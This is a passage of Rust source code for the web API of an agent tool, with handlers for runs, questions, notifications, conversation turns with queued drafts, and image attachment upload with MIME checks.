3338 .filter_map(|e| {
3339 let path = e.path().join("run.json");
3340 let mtime = path
3341 .metadata()
3342 .ok()?
3343 .modified()
3344 .ok()?
3345 .duration_since(std::time::UNIX_EPOCH)
3346 .ok()?
3347 .as_millis() as u64;
3348 let id = e.file_name().to_string_lossy().into_owned();
3349 Some((id, mtime))
3350 })
3351 .collect();
3352
3353 if entries.is_empty() {
3354 return 0;
3355 }
3356
3357 entries.sort_unstable();
3358 let mut hasher = std::hash::DefaultHasher::new();
3359 for (id, mtime) in &entries {
3360 id.hash(&mut hasher);
3361 mtime.hash(&mut hasher);
3362 }
3363 let h = hasher.finish();
3364 if h == 0 { 1 } else { h }
3365}
3366
3367fn run_ids(runs: &FsPath) -> Vec<String> {
3373 let mut ids: Vec<String> = std::fs::read_dir(runs)
3374 .into_iter()
3375 .flatten()
3376 .flatten()
3377 .filter(|e| e.path().join("run.json").is_file())
3378 .map(|e| e.file_name().to_string_lossy().into_owned())
3379 .collect();
3380 ids.sort_unstable_by(|a, b| b.cmp(a));
3382 ids
3383}
3384
3385fn read_run(runs: &FsPath, id: &str) -> Result<RunState> {
3387 let path = runs.join(id).join("run.json");
3388 let body =
3389 std::fs::read_to_string(&path).with_context(|| format!("read {}", path.display()))?;
3390 let state: RunState =
3391 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
3392 if state.schema != run::SCHEMA {
3393 anyhow::bail!(
3394 "run {} was written by a different magi (schema {}, this build speaks {})",
3395 state.id,
3396 state.schema,
3397 run::SCHEMA
3398 );
3399 }
3400 Ok(state)
3401}
3402
3403#[must_use]
3411pub fn runs_unreadable(runs: &FsPath) -> usize {
3412 run_ids(runs)
3413 .into_iter()
3414 .filter(|id| read_run(runs, id).is_err())
3415 .count()
3416}
3417
3418fn resolve_run(runs: &FsPath, id: &str) -> ApiResult<String> {
3420 if runs.join(id).join("run.json").is_file() {
3421 return Ok(id.to_owned());
3422 }
3423 pick(run_ids(runs), id, "run")
3424}
3425
3426fn resolve_task(queue: &Queue, id: &str) -> ApiResult<String> {
3428 if queue.path_of(id).is_file() {
3429 return Ok(id.to_owned());
3430 }
3431 pick(queue.list().into_iter().map(|t| t.id).collect(), id, "task")
3432}
3433
3434#[derive(Debug, Serialize)]
3445struct QuestionView {
3446 #[serde(flatten)]
3447 question: Question,
3448 detail_md: Vec<md::Node>,
3449 waiting_on_agent: bool,
3459}
3460
3461impl From<Question> for QuestionView {
3462 fn from(question: Question) -> Self {
3463 let base = md::ImageBase::QuestionPanel {
3464 id: question.id.clone(),
3465 };
3466 Self {
3467 detail_md: md::to_nodes(&question.detail, &base),
3468 waiting_on_agent: question.waiting_on_agent(),
3469 question,
3470 }
3471 }
3472}
3473
3474async fn questions_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<QuestionView>>> {
3480 blocking(move || {
3481 Ok(Json(
3482 ui.questions
3483 .list()
3484 .into_iter()
3485 .map(QuestionView::from)
3486 .collect(),
3487 ))
3488 })
3489 .await
3490}
3491
3492async fn notifications_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3495 blocking(move || {
3496 let items = ui.notices.list();
3497 let unread = items.iter().filter(|n| n.unread()).count();
3498 Ok(Json(
3499 serde_json::json!({ "unread": unread, "items": items }),
3500 ))
3501 })
3502 .await
3503}
3504
3505fn notice_error(e: anyhow::Error) -> ApiError {
3506 ApiError::not_found(format!("{e:#}"))
3509}
3510
3511async fn notification_read(
3513 State(ui): State<Arc<Ui>>,
3514 Path(id): Path<String>,
3515) -> ApiResult<Json<Notice>> {
3516 blocking(move || ui.notices.mark_read(&id).map(Json).map_err(notice_error)).await
3517}
3518
3519async fn notification_dismiss(
3521 State(ui): State<Arc<Ui>>,
3522 Path(id): Path<String>,
3523) -> ApiResult<Json<Notice>> {
3524 blocking(move || ui.notices.dismiss(&id).map(Json).map_err(notice_error)).await
3525}
3526
3527async fn notifications_read_all(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3529 blocking(move || {
3530 let changed = ui.notices.mark_all_read()?;
3531 Ok(Json(serde_json::json!({ "marked": changed })))
3532 })
3533 .await
3534}
3535
3536#[derive(Debug, Default, Deserialize)]
3542#[serde(default, deny_unknown_fields)]
3543struct NewAnswer {
3544 choice: Option<String>,
3545 text: Option<String>,
3546}
3547
3548async fn question_answer(
3549 State(ui): State<Arc<Ui>>,
3550 Path(id): Path<String>,
3551 body: std::result::Result<Json<NewAnswer>, axum::extract::rejection::JsonRejection>,
3552) -> ApiResult<Json<QuestionView>> {
3553 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3554 let answer = match (body.choice, body.text) {
3555 (Some(c), None) => Answer::Choice(c),
3556 (None, Some(t)) => Answer::Text(t),
3557 (Some(_), Some(_)) => {
3558 return Err(ApiError::bad_request(
3559 "send either `choice` or `text`, not both",
3560 ));
3561 }
3562 (None, None) => {
3563 return Err(ApiError::bad_request("send a `choice` or a `text`"));
3564 }
3565 };
3566
3567 blocking(move || {
3568 let id = resolve_question(&ui.questions, &id)?;
3569 let mut q = ui
3570 .questions
3571 .get(&id)
3572 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3573 if !q.status.open() {
3574 return Err(ApiError::conflict(format!(
3578 "question {} is already {}",
3579 q.short(),
3580 q.status.as_str()
3581 )));
3582 }
3583 q.answer(answer).map_err(ApiError::bad_request_from)?;
3587 ui.questions.put(&mut q)?;
3588 Ok(Json(QuestionView::from(q)))
3589 })
3590 .await
3591}
3592
3593#[derive(Debug, Deserialize)]
3595#[serde(deny_unknown_fields)]
3596struct NewSay {
3597 body: String,
3598}
3599
3600async fn question_say(
3610 State(ui): State<Arc<Ui>>,
3611 Path(id): Path<String>,
3612 body: std::result::Result<Json<NewSay>, JsonRejection>,
3613) -> ApiResult<Json<QuestionView>> {
3614 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3615 blocking(move || {
3616 let id = resolve_question(&ui.questions, &id)?;
3617 let mut q = ui
3618 .questions
3619 .get(&id)
3620 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3621 if !q.status.open() {
3622 return Err(ApiError::conflict(format!(
3626 "question {} is already {}",
3627 q.short(),
3628 q.status.as_str()
3629 )));
3630 }
3631 q.say(body.body).map_err(ApiError::bad_request_from)?;
3634 ui.questions.put(&mut q)?;
3635 Ok(Json(QuestionView::from(q)))
3636 })
3637 .await
3638}
3639
3640fn resolve_question(store: &Questions, id: &str) -> ApiResult<String> {
3642 if store.path_of(id).is_file() {
3643 return Ok(id.to_owned());
3644 }
3645 pick(
3646 store.list().into_iter().map(|q| q.id).collect(),
3647 id,
3648 "question",
3649 )
3650}
3651
3652async fn question_panel(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Response> {
3667 blocking(move || {
3668 let id = resolve_question(&ui.questions, &id)?;
3669 let Some(html) = ui.questions.panel_html(&id) else {
3670 return Err(ApiError::not_found(format!("question {id} has no panel")));
3671 };
3672 Ok(panel_response(
3673 "text/html; charset=utf-8",
3674 false,
3675 html.into_bytes(),
3676 ))
3677 })
3678 .await
3679}
3680
3681async fn question_asset(
3709 State(ui): State<Arc<Ui>>,
3710 Path((id, name)): Path<(String, String)>,
3711) -> ApiResult<Response> {
3712 if !crate::ask::valid_asset_name(&name) {
3715 return Err(ApiError::bad_request(format!(
3716 "`{name}` is not a usable asset name"
3717 )));
3718 }
3719 blocking(move || {
3720 let id = resolve_question(&ui.questions, &id)?;
3721 let asset = ui
3722 .questions
3723 .panel_asset(&id, &name)
3724 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
3725 let Some(bytes) = asset else {
3726 return Err(ApiError::not_found(format!(
3727 "question {id} has no asset `{name}`"
3728 )));
3729 };
3730 Ok(panel_response(
3731 asset_content_type(&name),
3732 is_svg(&name),
3733 bytes,
3734 ))
3735 })
3736 .await
3737}
3738
3739fn asset_content_type(name: &str) -> &'static str {
3752 match extension(name).as_deref() {
3753 Some("png") => "image/png",
3754 Some("jpg" | "jpeg") => "image/jpeg",
3755 Some("gif") => "image/gif",
3756 Some("webp") => "image/webp",
3757 Some("svg") => "image/svg+xml",
3758 Some("css") => "text/css; charset=utf-8",
3759 Some("txt") => "text/plain; charset=utf-8",
3760 _ => "application/octet-stream",
3761 }
3762}
3763
3764fn is_svg(name: &str) -> bool {
3767 extension(name).as_deref() == Some("svg")
3768}
3769
3770fn extension(name: &str) -> Option<String> {
3772 name.rsplit_once('.')
3773 .map(|(_, ext)| ext.to_ascii_lowercase())
3774}
3775
3776fn panel_response(content_type: &'static str, download: bool, body: Vec<u8>) -> Response {
3793 let mut res = (
3794 [
3795 (header::CONTENT_TYPE, content_type),
3796 (header::CONTENT_SECURITY_POLICY, PANEL_CSP),
3797 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3798 (header::REFERRER_POLICY, "no-referrer"),
3799 ],
3800 body,
3801 )
3802 .into_response();
3803 if download {
3804 res.headers_mut().insert(
3805 header::CONTENT_DISPOSITION,
3806 HeaderValue::from_static("attachment"),
3807 );
3808 }
3809 res
3810}
3811
3812#[derive(Debug, Serialize)]
3818struct TalkView {
3819 #[serde(flatten)]
3820 talk: Talk,
3821 turn_bodies_md: Vec<Vec<md::Node>>,
3822 thinking: bool,
3830}
3831
3832impl TalkView {
3833 fn new(talk: Talk, thinking: bool) -> Self {
3834 let turn_bodies_md = talk
3835 .turns
3836 .iter()
3837 .map(|turn| md::to_nodes(&turn.body, &md::ImageBase::None))
3838 .collect();
3839 Self {
3840 turn_bodies_md,
3841 thinking,
3842 talk,
3843 }
3844 }
3845}
3846
3847#[derive(Debug, Serialize)]
3852struct TalkDetailView {
3853 #[serde(flatten)]
3854 view: TalkView,
3855 tasks: Vec<TaskView>,
3856}
3857
3858async fn talks_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TalkView>>> {
3863 blocking(move || {
3864 Ok(Json(
3865 ui.talks
3866 .list()
3867 .into_iter()
3868 .map(|talk| {
3869 let thinking = ui.is_thinking(&talk.id);
3870 TalkView::new(talk, thinking)
3871 })
3872 .collect(),
3873 ))
3874 })
3875 .await
3876}
3877
3878#[derive(Debug, Default, Deserialize)]
3883#[serde(default)]
3884struct NewTalk {
3885 agent: Option<String>,
3886 repo: Option<PathBuf>,
3887}
3888
3889async fn talk_post(
3892 State(ui): State<Arc<Ui>>,
3893 body: std::result::Result<Json<NewTalk>, JsonRejection>,
3894) -> ApiResult<impl IntoResponse> {
3895 let body = match body {
3899 Ok(Json(body)) => body,
3900 Err(JsonRejection::MissingJsonContentType(_)) => NewTalk::default(),
3901 Err(e) => return Err(ApiError::bad_request(e.body_text())),
3902 };
3903 let repo = body.repo.clone().unwrap_or_else(|| ui.repo.clone());
3904 let cfg = config_for(&repo).await?;
3905 let view = blocking(move || {
3906 let talk = talk::begin(&ui.talks, &cfg, repo, body.agent.as_deref())?;
3907 let thinking = ui.is_thinking(&talk.id);
3908 Ok(TalkView::new(talk, thinking))
3909 })
3910 .await?;
3911 Ok((StatusCode::CREATED, Json(view)))
3912}
3913
3914async fn talk_detail(
3916 State(ui): State<Arc<Ui>>,
3917 Path(id): Path<String>,
3918) -> ApiResult<Json<TalkDetailView>> {
3919 blocking(move || {
3920 let id = resolve_talk(&ui.talks, &id)?;
3921 let talk = ui.talks.get(&id)?;
3922 let thinking = ui.is_thinking(&talk.id);
3923 let tasks = talk::tasks_of(&ui.queue, &talk.id)
3924 .into_iter()
3925 .map(TaskView::from)
3926 .collect();
3927 Ok(Json(TalkDetailView {
3928 view: TalkView::new(talk, thinking),
3929 tasks,
3930 }))
3931 })
3932 .await
3933}
3934
3935#[derive(Debug, Default, Deserialize)]
3941#[serde(default, deny_unknown_fields)]
3942struct NewTalkTurn {
3943 text: String,
3944 attachments: Vec<String>,
3945}
3946
3947#[derive(Debug, Deserialize)]
3948#[serde(deny_unknown_fields)]
3949struct EditTalkPending {
3950 text: String,
3951 expected_text: String,
3952 expected_attachments: Vec<String>,
3953}
3954
3955#[derive(Debug, Deserialize)]
3956#[serde(deny_unknown_fields)]
3957struct ClearTalkPending {
3958 expected_text: String,
3959 expected_attachments: Vec<String>,
3960}
3961
3962async fn talk_say(
3974 State(ui): State<Arc<Ui>>,
3975 Path(id): Path<String>,
3976 body: std::result::Result<Json<NewTalkTurn>, JsonRejection>,
3977) -> ApiResult<(StatusCode, Json<TalkView>)> {
3978 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3979 if body.text.trim().is_empty() && body.attachments.is_empty() {
3980 return Err(ApiError::bad_request("say something"));
3981 }
3982
3983 let id = {
3984 let ui = Arc::clone(&ui);
3985 let asked = id.clone();
3986 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3987 };
3988 {
3992 let ui = Arc::clone(&ui);
3993 let id = id.clone();
3994 blocking(move || {
3995 let talk = ui.talks.get(&id)?;
3996 if !talk.status.open() {
3997 return Err(ApiError::conflict(format!(
3998 "talk {} is {} and takes no more turns",
3999 talk.short(),
4000 talk.status.as_str()
4001 )));
4002 }
4003 Ok(())
4004 })
4005 .await?;
4006 }
4007
4008 let attachments = {
4013 let ui = Arc::clone(&ui);
4014 let id = id.clone();
4015 let ids = body.attachments.clone();
4016 blocking(move || {
4017 ids.into_iter()
4018 .map(|att_id| {
4019 ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
4020 ApiError::bad_request(format!("unknown attachment `{att_id}`"))
4021 })
4022 })
4023 .collect::<ApiResult<Vec<talk::Attachment>>>()
4024 })
4025 .await?
4026 };
4027
4028 let start = {
4033 let ui = Arc::clone(&ui);
4034 let id = id.clone();
4035 blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
4036 };
4037 let turn_guard = match start {
4038 TalkTurnStart::Claimed(turn_guard) => turn_guard,
4039 TalkTurnStart::Pending => {
4040 return Err(ApiError::conflict(
4041 "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
4042 ));
4043 }
4044 TalkTurnStart::Busy => {
4045 let (tx, rx) = tokio::sync::oneshot::channel();
4061 tokio::spawn({
4062 let ui = Arc::clone(&ui);
4063 let id = id.clone();
4064 let said = body.text.clone();
4065 async move {
4066 let written = blocking({
4067 let ui = Arc::clone(&ui);
4068 let id = id.clone();
4069 move || {
4070 let mut talk = ui.talks.get(&id)?;
4071 #[cfg(test)]
4076 if let Some(gate) = ui
4077 .busy_queue_gate
4078 .lock()
4079 .unwrap_or_else(PoisonError::into_inner)
4080 .take()
4081 {
4082 let _ = gate.reached.send(());
4083 let _ = gate.release.recv();
4084 }
4085 if let Err(error) =
4086 talk::queue(&mut talk, &ui.talks, &said, attachments)
4087 {
4088 if let Ok(fresh) = ui.talks.get(&id) {
4089 if !fresh.status.open() {
4090 return Err(ApiError::conflict(format!(
4091 "talk {} is {} and takes no more turns",
4092 fresh.short(),
4093 fresh.status.as_str()
4094 )));
4095 }
4096 }
4097 return Err(ApiError::from(error));
4098 }
4099 let claim = match ui.begin_queued_talk_turn(&id)? {
4110 Some(turn_guard) => {
4111 let (cfg, _) = Config::discover(&talk.repo, None)?;
4112 Some((talk.clone(), cfg, turn_guard))
4113 }
4114 None => None,
4115 };
4116 let thinking = ui.is_thinking(&id);
4117 Ok((TalkView::new(talk, thinking), claim))
4118 }
4119 })
4120 .await;
4121 let (view, reclaimed) = match written {
4122 Ok(pair) => pair,
4123 Err(e) => {
4124 let _ = tx.send(Err(e));
4129 return;
4130 }
4131 };
4132 let _ = tx.send(Ok(view));
4135 if let Some((talk, cfg, turn_guard)) = reclaimed {
4136 let talks = ui.talks.clone();
4137 drain_loop(talk, talks, cfg, id, turn_guard).await;
4138 }
4139 }
4140 });
4141 let view = rx
4142 .await
4143 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
4144 return Ok((StatusCode::ACCEPTED, Json(view)));
4145 }
4146 };
4147
4148 let (talk, cfg) = {
4149 let ui = Arc::clone(&ui);
4150 let id = id.clone();
4151 blocking(move || {
4152 let talk = ui.talks.get(&id)?;
4153 let (cfg, _) = Config::discover(&talk.repo, None)?;
4154 Ok((talk, cfg))
4155 })
4156 .await?
4157 };
4158
4159 let talks = ui.talks.clone();
4160 let (tx, rx) = tokio::sync::oneshot::channel();
4175 tokio::spawn({
4176 let ui = Arc::clone(&ui);
4177 let talks = talks.clone();
4178 let id = id.clone();
4179 let said = body.text.clone();
4180 let mut talk = talk.clone();
4181 async move {
4182 let recorded = blocking({
4183 let talks = talks.clone();
4184 move || {
4185 if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
4186 if let Ok(fresh) = talks.get(&talk.id) {
4187 if !fresh.status.open() {
4188 return Err(ApiError::conflict(format!(
4189 "talk {} is {} and takes no more turns",
4190 fresh.short(),
4191 fresh.status.as_str()
4192 )));
4193 }
4194 }
4195 return Err(ApiError::from(error));
4196 }
4197 Ok((said.trim().to_owned(), talk))
4203 }
4204 })
4205 .await;
4206 let (text, mut talk) = match recorded {
4207 Ok(pair) => pair,
4208 Err(e) => {
4209 let _ = tx.send(Err(e));
4213 return;
4214 }
4215 };
4216 let queued = talk.clone();
4217 let thinking = ui.is_thinking(&id);
4218 let _ = tx.send(Ok((queued, thinking)));
4221
4222 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
4223 tracing::warn!("talk {id} turn failed: {e:#}");
4227 }
4228 drain_loop(talk, talks, cfg, id, turn_guard).await;
4231 }
4232 });
4233
4234 let (queued, thinking) = rx
4235 .await
4236 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
4237
4238 Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
4240}
4241
4242async fn talk_pending_resume(
4246 State(ui): State<Arc<Ui>>,
4247 Path(id): Path<String>,
4248) -> ApiResult<(StatusCode, Json<TalkView>)> {
4249 let id = {
4250 let ui = Arc::clone(&ui);
4251 let asked = id.clone();
4252 blocking(move || resolve_talk(&ui.talks, &asked)).await?
4253 };
4254 let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
4255 return Err(ApiError::conflict(
4256 "a talk turn is already running; the queued draft will be handled by it",
4257 ));
4258 };
4259 let (talk, cfg) = {
4260 let ui = Arc::clone(&ui);
4261 let id = id.clone();
4262 blocking(move || {
4263 let talk = ui.talks.get(&id)?;
4264 if !talk.status.open() {
4265 return Err(ApiError::conflict(format!(
4266 "talk {} is {} and takes no more turns",
4267 talk.short(),
4268 talk.status.as_str()
4269 )));
4270 }
4271 if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
4272 return Err(ApiError::conflict("there is no queued draft to resume"));
4273 }
4274 let (cfg, _) = Config::discover(&talk.repo, None)?;
4275 Ok((talk, cfg))
4276 })
4277 .await?
4278 };
4279 let view = TalkView::new(talk.clone(), true);
4280 let talks = ui.talks.clone();
4281 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4282 Ok((StatusCode::ACCEPTED, Json(view)))
4283}
4284
4285async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
4301 let live_set = Arc::clone(&turn.turns);
4302 let mut turn = Some(turn);
4310 loop {
4311 let observed = live_set
4315 .lock()
4316 .unwrap_or_else(PoisonError::into_inner)
4317 .queued
4318 .get(&id)
4319 .copied()
4320 .unwrap_or(0);
4321 let drained = blocking({
4322 let talks = talks.clone();
4323 move || {
4324 let result = talk::drain(&mut talk, &talks);
4325 Ok((talk, result))
4326 }
4327 })
4328 .await;
4329 let (next_talk, result) = match drained {
4330 Ok(drained) => drained,
4331 Err(e) => {
4332 tracing::warn!(
4333 status = %e.status,
4334 message = %e.message,
4335 "talk {id} could not start queued-text drain"
4336 );
4337 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4338 turn.take()
4339 .expect("held for the whole loop until released here")
4340 .release(&mut live);
4341 break;
4342 }
4343 };
4344 talk = next_talk;
4345 let drained = match result {
4346 Ok(Some(drained)) => drained,
4347 Ok(None) => {
4348 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4349 if live.queued.get(&id).copied().unwrap_or(0) != observed {
4350 continue;
4351 }
4352 turn.take()
4353 .expect("held for the whole loop until released here")
4354 .release(&mut live);
4355 break;
4356 }
4357 Err(e) => {
4358 tracing::warn!("talk {id} could not drain queued text: {e:#}");
4359 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4360 turn.take()
4361 .expect("held for the whole loop until released here")
4362 .release(&mut live);
4363 break;
4364 }
4365 };
4366 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
4367 tracing::warn!("talk {id} turn failed: {e:#}");
4368 }
4369 }
4370}
4371
4372async fn talk_pending_clear(
4374 State(ui): State<Arc<Ui>>,
4375 Path(id): Path<String>,
4376 body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
4377) -> ApiResult<Json<TalkView>> {
4378 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4379 blocking(move || {
4380 let id = resolve_talk(&ui.talks, &id)?;
4381 let mut talk = ui.talks.get(&id)?;
4382 if !talk.status.open() {
4383 return Err(ApiError::conflict(format!(
4384 "talk {} is {} and takes no more turns",
4385 talk.short(),
4386 talk.status.as_str()
4387 )));
4388 }
4389 if !talk::clear_pending_if_matches(
4390 &mut talk,
4391 &ui.talks,
4392 &body.expected_text,
4393 &body.expected_attachments,
4394 )? {
4395 return Err(ApiError::conflict(
4396 "queued message changed; reload it before clearing",
4397 ));
4398 }
4399 let thinking = ui.is_thinking(&talk.id);
4400 Ok(Json(TalkView::new(talk, thinking)))
4401 })
4402 .await
4403}
4404
4405async fn talk_pending_edit(
4409 State(ui): State<Arc<Ui>>,
4410 Path(id): Path<String>,
4411 body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
4412) -> ApiResult<Json<TalkView>> {
4413 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4414 let (view, reclaimed) = blocking({
4415 let ui = Arc::clone(&ui);
4416 move || {
4417 let id = resolve_talk(&ui.talks, &id)?;
4418 let mut talk = ui.talks.get(&id)?;
4419 if !talk.status.open() {
4420 return Err(ApiError::conflict(format!(
4421 "talk {} is {} and takes no more turns",
4422 talk.short(),
4423 talk.status.as_str()
4424 )));
4425 }
4426 if !talk::edit_pending_text(
4427 &mut talk,
4428 &ui.talks,
4429 &body.text,
4430 &body.expected_text,
4431 &body.expected_attachments,
4432 )? {
4433 return Err(ApiError::conflict(
4434 "queued message changed; reload it before editing",
4435 ));
4436 }
4437 let claim = match ui.begin_queued_talk_turn(&id)? {
4438 Some(turn_guard) => {
4439 let (cfg, _) = Config::discover(&talk.repo, None)?;
4440 Some((talk.clone(), cfg, id.clone(), turn_guard))
4441 }
4442 None => None,
4443 };
4444 let thinking = ui.is_thinking(&id);
4445 Ok((TalkView::new(talk, thinking), claim))
4446 }
4447 })
4448 .await?;
4449 if let Some((talk, cfg, id, turn_guard)) = reclaimed {
4450 let talks = ui.talks.clone();
4451 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4452 }
4453 Ok(Json(view))
4454}
4455
4456async fn talk_close(
4458 State(ui): State<Arc<Ui>>,
4459 Path(id): Path<String>,
4460) -> ApiResult<Json<TalkView>> {
4461 blocking(move || {
4462 let id = resolve_talk(&ui.talks, &id)?;
4463 let mut talk = ui.talks.get(&id)?;
4464 talk::close(&mut talk, &ui.talks)?;
4465 let thinking = ui.is_thinking(&talk.id);
4466 Ok(Json(TalkView::new(talk, thinking)))
4467 })
4468 .await
4469}
4470
4471async fn talk_reopen(
4473 State(ui): State<Arc<Ui>>,
4474 Path(id): Path<String>,
4475) -> ApiResult<Json<TalkView>> {
4476 blocking(move || {
4477 let id = resolve_talk(&ui.talks, &id)?;
4478 let mut talk = ui.talks.get(&id)?;
4479 talk::reopen(&mut talk, &ui.talks)?;
4480 let thinking = ui.is_thinking(&talk.id);
4481 Ok(Json(TalkView::new(talk, thinking)))
4482 })
4483 .await
4484}
4485
4486async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
4496 blocking(move || {
4497 let id = resolve_talk(&ui.talks, &id)?;
4498 ui.talks.remove(&id)?;
4499 Ok(StatusCode::NO_CONTENT)
4500 })
4501 .await
4502}
4503
4504fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
4506 pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
4507}
4508
4509async fn talk_attachment_post(
4512 State(ui): State<Arc<Ui>>,
4513 Path(id): Path<String>,
4514 headers: HeaderMap,
4515 body: Bytes,
4516) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
4517 let mime = validate_attachment(&headers, &body)?;
4518 let name = filename_header(&headers);
4519 let data = body.to_vec();
4520 blocking(move || {
4521 let id = resolve_talk(&ui.talks, &id)?;
4522 let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
4523 Ok((StatusCode::CREATED, Json(att)))
4524 })
4525 .await
4526}
4527
4528async fn talk_attachment_get(
4531 State(ui): State<Arc<Ui>>,
4532 Path((id, att)): Path<(String, String)>,
4533) -> ApiResult<Response> {
4534 blocking(move || {
4535 let id = resolve_talk(&ui.talks, &id)?;
4536 let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
4537 return Err(ApiError::not_found(format!(
4538 "talk {id} has no attachment `{att}`"
4539 )));
4540 };
4541 Ok(attachment_response(&meta.mime, data))
4542 })
4543 .await
4544}
4545
4546fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
4557 if data.len() > ATTACHMENT_MAX_BYTES {
4558 return Err(ApiError::bad_request(format!(
4559 "attachment is {} bytes, over the {} MiB limit",
4560 data.len(),
4561 ATTACHMENT_MAX_BYTES / (1024 * 1024)
4562 ))
4563 .with_status(StatusCode::PAYLOAD_TOO_LARGE));
4564 }
4565 if data.is_empty() {
4566 return Err(ApiError::bad_request("attachment is empty"));
4567 }
4568 let declared = declared_mime(headers)?;
4569 match sniffed_mime(data) {
4570 Some(sniffed) if sniffed == declared => Ok(declared),
4571 Some(sniffed) => Err(ApiError::bad_request(format!(
4572 "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
4573 ))),
4574 None => Err(ApiError::bad_request(
4575 "the file's bytes do not match any accepted image format",
4576 )),
4577 }
4578}
4579
4580fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
4584 let raw = headers
4585 .get(header::CONTENT_TYPE)
4586 .and_then(|v| v.to_str().ok())
4587 .unwrap_or("")
4588 .split(';')
4589 .next()
4590 .unwrap_or("")
4591 .trim()
4592 .to_ascii_lowercase();
4593 ATTACHMENT_MIME_WHITELIST
4594 .iter()
4595 .find(|&&m| m == raw)
4596 .copied()
4597 .ok_or_else(|| {
4598 if raw == "image/svg+xml" {
4599 ApiError::bad_request(
4600 "SVG is not accepted: it can carry active content (e.g. a <script>), \
4601 not just a picture",
4602 )
4603 } else if raw.is_empty() {
4604 ApiError::bad_request("Content-Type is required for an attachment upload")
4605 } else {
4606 ApiError::bad_request(format!(
4607 "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
4608 image/gif or image/webp"
4609 ))
4610 }
4611 })
4612}
4613
4614fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
4617 if data.starts_with(b"\x89PNG\r\n\x1a\n") {
4618 Some("image/png")
4619 } else if data.starts_with(b"\xff\xd8\xff") {
4620 Some("image/jpeg")
4621 } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
4622 Some("image/gif")
4623 } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
4624 Some("image/webp")
4625 } else {
4626 None
4627 }
4628}
4629
4630fn filename_header(headers: &HeaderMap) -> String {
4636 headers
4637 .get(FILENAME_HEADER)
4638 .and_then(|v| v.to_str().ok())
4639 .map(str::trim)
4640 .filter(|s| !s.is_empty())
4641 .unwrap_or("attachment")
4642 .to_owned()
4643}
4644
4645fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
4652 let content_type = ATTACHMENT_MIME_WHITELIST
4653 .iter()
4654 .find(|&&m| m == mime)
4655 .copied()
4656 .unwrap_or("application/octet-stream");
4657 (
4658 [
4659 (header::CONTENT_TYPE, content_type),
4660 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
4661 ],
4662 body,
4663 )
4664 .into_response()
4665}
4666
4667async fn config_for(repo: &FsPath) -> ApiResult<Config> {
4675 let repo = repo.to_path_buf();
4676 blocking(move || {
4677 let (cfg, _) = Config::discover(&repo, None)?;
4678 Ok(cfg)
4679 })
4680 .await
4681}
4682
4683fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
4689 let mut hits = ids
4690 .into_iter()
4691 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
4692 match (hits.next(), hits.next()) {
4693 (Some(one), None) => Ok(one),
4694 (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
4695 (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
4696 "`{prefix}` matches more than one {what}, including {a} and {b}"
4697 ))),
4698 }
4699}
4700
4701#[cfg(test)]
4702mod tests {
4703 use pretty_assertions::assert_eq;
4704 use serde_json::Value;
4705 use tempfile::TempDir;
4706 use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
4707
4708 use super::*;
4709 use crate::config::Config;
4710 use crate::queue::{Source, TaskStatus};
4711
4712 const SETTLE_STEPS: usize = 3_000;
4723
4724 struct Fixture {
4730 home: TempDir,
4731 addr: SocketAddr,
4732 }
4733
4734 impl Fixture {
